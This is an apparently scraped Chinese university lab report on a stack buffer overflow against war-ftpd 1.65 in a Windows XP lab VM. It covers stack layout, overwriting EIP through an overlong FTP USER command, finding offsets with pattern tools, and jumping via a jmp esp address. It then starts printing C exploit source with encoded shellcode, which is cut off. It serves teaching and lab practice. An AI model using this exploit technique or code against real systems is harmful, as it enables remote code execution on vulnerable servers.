网络攻击与防范实验报告.doc

《网络攻击与防范实验报告.doc》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、实验报告第8页，共8页网络攻击与防范实验报告姓名：____学号：__所在班级：实验名称：缓冲区溢出实验实验日期：2014年11月9日指导老师：张玉清实验评分：验收评语：实验目的：1、掌握缓冲区溢出的原理2、掌握常用的缓冲区溢出方法3、理解缓冲区溢出的危害性4、掌握防范和避免缓冲区溢出攻击的方法实验环境：主机系统：Windows8x64位虚拟机系统：WindowsXP(SP3)（IP：192.168.137.128）溢出对象：war-ftpd1.65调试工具：CDB(DebuggingToolsforWindows)；开发环境：VisualStudio2013开发语言：C语言缓冲区溢出原理

2、：在metasploit中搜索war-ftp可以发现war-ftpd1.65在windows下有以下漏洞usernameoverflow，也就是在用户使用userusername这个指令时，如果username过长就会发生缓冲区溢出。计算机在调用函数function（arg1,…,argm）时，函数栈的布局如图1所示，首先将函数的实参从右往左依次压栈，即argm,…,arg1。然后将函数返回地址RET压栈。这时EBP指向当前函数的基地址，ESP指向栈顶，将此时的EBP压栈，然后ESP的值赋给EBP，这样EBP就指向新的函数栈的基地址。调用函数后，再将局部变量依次压栈，这时ESP始终指向栈

3、顶。另外还有一个EIP寄存器，EIP中存放的是下一个要执行的指令的地址，程序崩溃时EIP的值就是RET。通过构造特殊的字符串，即两两都不相同的字符串，我们可以根据EIP的值定位RET的位置。知道了RET的位置以后，我们只要在RET这个位置放上我们想要执行的跳转指令就可以实现跳转。为了方便我们找一个系统中现成的指令jmpesp来实现跳转。jmpesp指令在内存中的通用地址是0x7ffa4512，可以通过CDB的U7ffa4512来确定该地址中存放的是否为jmpesp。jmpesp将EIP指向了esp指向的位置，我们用定位RET的办法同样定位ESP指向的位置，然后用shellcode替换这块

4、字符串，这样计算机就会执行shellcode，从而实现攻击。当然，我们还可以用其他的指令，如jmpesi，同样得到jmpesi指令在系统内存中的地址，以及esi指向的内存，我们就可以执行shellcode。也可以使用多次跳转。实验报告第8页，共8页图1函数栈的布局实验步骤：1、测试漏洞是否存在1)在虚拟机上用CDB将war-ftpd.exe挂起2)使用主机与虚拟机上的war-ftpd建立连接>ftp–n>open192.168.137.128>user‘A’*10000实验报告第8页，共8页1)溢出成功，CDB捕获到war-ftpd异常，EIP被“AAAA”覆盖。ESP指向的位置也全是字

5、符‘A’。2、定位RET在字符串中的位置以及ESP指向的位置。1)使用patternCreate构造1000个不一样字符构成的字符串实验报告第8页，共8页1)在虚拟机上用CDB将war-ftpd.exe挂起2)再次使用主机与虚拟机上的war-ftpd建立连接>ftp–n>open192.168.137.128>userstr不同字符的字符串实验报告第8页，共8页1)程序溢出，EIP=，ESP指向的位置中存放的是2)利用patternOffset定位RET和ESP指向的位置，RET的相对位置是485，ESP的相对位置是493实验报告第8页，共8页1)构造字符串，编写攻击程序。2、测试攻击程

6、序，能够在虚拟机中弹出计算器框附：攻击程序源代码#include"stdafx.h"#include#pragmacomment(lib,"ws2_32")int_tmain(intargc,_TCHAR*argv[])实验报告第8页，共8页{charshellcode[]="xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49""x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42""x58x50x30x

7、41x31x42x41x6bx41x41x52x32x41x42x41x32""x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a""x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c""x4bx73x4cx74x45x31x68x54x